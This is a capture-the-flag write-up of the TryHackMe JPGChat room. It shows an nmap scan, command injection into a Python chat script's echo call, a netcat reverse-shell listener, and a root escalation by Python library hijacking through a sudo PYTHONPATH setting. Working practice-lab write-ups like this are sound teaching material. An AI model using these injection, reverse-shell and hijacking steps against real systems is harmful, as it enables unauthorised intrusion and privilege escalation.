Tryhackme JPGChat Writeup
Let’s start with nmap scanning first
Command: nmap -vv -sCV 10.10.103.19
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fe:cc:3e:20:3f:a2:f8:09:6f:2c:a3:af:fa:32:9c:94 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqRxJhw/1rrvXuEkXF+agfTYMZrCisS01Z9EWAv8j6Cxjd00jBeaTGD/OsyuWUGwIqC0duALIIccwQfG2DjyrJCIPYyXyRiTbTSbqe07wX6qnnxV4xBmKdu8SxVlPKqVN36gQtbHWQqk9M45sej0M3Qz2q5ucrQVgWsjxYflYI1GZg7DSuWbI9/GNJPugt96uxupK0pJiJXNG26sM+w0BdF/DHlWFxG0Z+2CMqSlNt4EA2hlgBWKzGxvKbznJsapdtrAvKxBF6WOfz/FdLMQa7f28UOSs2NnUDrpz8Xhdqz2fj8RiV+gnywm8rkIzT8FOcMTGfsvOHoR8lVFvp5mj
| 256 e8:18:0c:ad:d0:63:5f:9d:bd:b7:84:b8:ab:7e:d1:97 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2CCqg8ac3eDsePDO27TM9OweWbaqytzrMyj+RbwDCHaAmfvhbA0CqTGdTIBAsVG6ect+OlqwgOvmTewS9ihB8=
| 256 82:1d:6b:ab:2d:04:d5:0b:7a:9b:ee:f4:64:b5:7f:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIXcEOgRyLk02uwr8mYrmAmFsUGPSUw1MHEDeH5qmcxv
3000/tcp open tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelLet’s listen to port number 3000 with netcat
Command: nc 10.10.103.19 3000
Says there are codes in the admin account on Github.
When we look at the file named “jpchat.py”, we see that it writes our inputs to a file with the “echo” command.
We can inject our command here.
Command: echo test;whoami; > a.txt
Yes, now we can inject our malicious code by typing “[REPORT]” on the port number 3000, which we are listening with netcat.
By starting our listening with Netcat, we can get reverse shell.
Command: nc -lvp 4444
listening on [any] 4444 ...
10.10.252.148: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.252.148] 45586
bash: cannot set terminal process group (1022): Inappropriate ioctl for device
bash: no job control in this shell
wes@ubuntu-xenial:/$We spawn pty with Python and export xterm.
Command: python -c 'import pty;pty.spawn(''/bin/bash'')'
Command: export TERM=xterm
We can get our first flag “user.txt” by going to our home file.
JPC{48703041**************6178318}Now we can root the box.
Command: sudo -l
Matching Defaults entries for wes on ubuntu-xenial:
mail_badpass, env_keep+=PYTHONPATHUser wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
Let’s read the python file in opt
Command: cat /opt/development/test_module.py
#!/usr/bin/env python3from compare import *print(compare.Str('hello', 'hello', 'hello'))
Here we can use the “python library hijacking” method.
Command: echo 'import os;os.system("/bin/bash")' > compare.py
Command: export PYTHONPATH=/home/wes/
Now we can run the python script.
Command: /usr/bin/python3 /opt/development/test_module.py
Yeah we are root now
Command: cd /root/ && cat root.txt
JPC{665b7f2e******************0b081b0a}Thank you for reading and solving
